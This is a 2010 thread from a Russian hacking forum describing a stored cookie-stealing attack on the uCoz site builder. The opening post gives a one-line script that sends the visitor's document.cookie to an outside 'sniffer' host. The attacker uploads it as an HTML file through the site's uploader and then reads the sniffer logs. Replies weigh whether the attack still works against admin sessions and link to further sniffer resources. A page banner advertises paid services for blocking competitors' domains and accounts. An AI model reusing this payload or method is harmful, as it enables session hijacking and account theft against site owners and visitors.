А вот и долгожданный Ucoz

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
А вот и долгожданный Ucoz

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

А вот и долгожданный Ucoz

18.03.2010, 01:50

Dr..VATSON

Новичок

Регистрация: 07.12.2008

Сообщений: 12

С нами: 9171191

Репутация: 43

А вот и долгожданный Ucoz

Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки

Код:

<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>

2) Загружаем наш html файлик через "Обзор"

Смотрим скрин

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин

Ну вот и всё...

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Dr..VATSON; 18.03.2010 в 19:22..

26.03.2010, 09:56

general.fox

Участник форума

Регистрация: 09.11.2009

Сообщений: 265

С нами: 8686461

Репутация: 18

На UcoZе куки Админов привязаны к IP.

26.03.2010, 09:58

general.fox

Участник форума

Регистрация: 09.11.2009

Сообщений: 265

С нами: 8686461

Репутация: 18

Хотя может я ошибаюсь...

04.04.2010, 17:16

Koder45ru

Новичок

Регистрация: 18.02.2010

Сообщений: 4

С нами: 8541138

Репутация: 0

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..

05.04.2010, 23:03

Rejiser

Новичок

Регистрация: 09.05.2009

Сообщений: 27

С нами: 8951802

Репутация: 21

Цитата:

Сообщение от Koder45ru

Хех где то похожее читал ток там через чат можно админку на укозе утащить..

не подскажешь где читал?)

06.04.2010, 07:52

sparrow3000

Участник форума

Регистрация: 27.03.2009

Сообщений: 248

С нами: 9013262

Репутация: 54

Цитата:

Сообщение от Koder45ru

если про бесцветный смайлик со скриптом то это не пашет уже

09.04.2010, 05:14

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

С нами: 8603287

Репутация: 87

не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде

14.05.2010, 12:06

NeoX

Познающий

Регистрация: 23.08.2008

Сообщений: 95

С нами: 9324141

Репутация: 45

еще актуально?

16.05.2010, 22:56

niva622

Новичок

Регистрация: 05.11.2008

Сообщений: 11

С нами: 9218527

Репутация: 0

еще актуально, но на некоторых сайтах запрещено добавлять html файлы..

#10

26.05.2010, 16:48

Новичок

Регистрация: 27.10.2009

Сообщений: 23

С нами: 8704870

Репутация: 12

Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
red.Button - UCOZ Pack v.3.0 - дополнении к доргену	GivioN	Разное - Покупка, продажа, обмен	0	03.01.2010 23:13
Скрипты под Ucoz	Vandam	PHP	14	26.02.2009 16:50
Лучший стих для античата	$ED$	Болталка	29	12.02.2009 02:47
Было в фирме три админа.!!! =)	Utochka	Болталка	15	18.03.2006 03:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL